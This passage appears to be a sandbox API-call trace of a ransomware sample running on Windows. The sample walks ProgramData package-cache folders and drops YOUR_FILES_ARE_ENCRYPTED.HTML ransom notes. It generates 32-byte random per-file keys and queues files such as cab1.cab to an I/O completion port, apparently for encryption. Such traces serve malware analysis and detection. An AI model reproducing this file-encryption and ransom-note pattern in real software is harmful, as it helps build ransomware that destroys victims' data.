ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0158.644] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.644] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.644] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0158.686] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.689] CloseHandle (hObject=0x5a0) returned 1 [0158.690] GetProcessHeap () returned 0x270000 [0158.691] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0158.692] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0158.692] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 82 [0158.692] GetProcessHeap () returned 0x270000 [0158.692] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.695] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0158.695] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0158.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.695] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.696] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.696] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0158.696] GetProcessHeap () returned 0x270000 [0158.696] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.697] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0158.697] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0158.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0158.698] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.698] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.698] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0158.698] GetProcessHeap () returned 0x270000 [0158.698] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.701] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0158.701] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0158.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.701] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.702] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc3166700, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.702] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0158.702] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.702] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.702] lstrlenW (lpString=".cab") returned 4 [0158.702] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.702] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.702] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0158.703] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=4932896) returned 1 [0158.703] GetProcessHeap () returned 0x270000 [0158.703] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.704] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AF") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="81") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="D3") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="77") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2E") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="F0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C9") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="4F") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CE") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="5D") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="20") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="93") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="D0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="1F") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E8") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="87") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5B") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="48") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="8F") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="DE") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="3B") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="27") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CF") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F3") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="71") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="13") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="C9") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="ED") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="DF") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="58") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2A") returned 2 [0158.706] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0158.706] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.706] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.707] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.707] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0158.707] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.707] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.707] lstrlenW (lpString=".msi") returned 4 [0158.708] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.709] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.709] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.710] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0158.710] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.722] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0159.027] CloseHandle (hObject=0x58c) returned 1 [0159.028] GetProcessHeap () returned 0x270000 [0159.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0159.029] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0159.029] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0159.029] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0159.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0159.030] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0159.032] CloseHandle (hObject=0x5a4) returned 1 [0159.032] GetProcessHeap () returned 0x270000 [0159.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0159.034] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0159.034] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0159.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0159.034] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0159.036] CloseHandle (hObject=0x5a0) returned 1 [0159.037] GetProcessHeap () returned 0x270000 [0159.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0159.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0159.043] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0159.043] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.044] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.046] CloseHandle (hObject=0x4a4) returned 1 [0159.046] GetProcessHeap () returned 0x270000 [0159.047] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.047] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0159.047] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned 46 [0159.047] GetProcessHeap () returned 0x270000 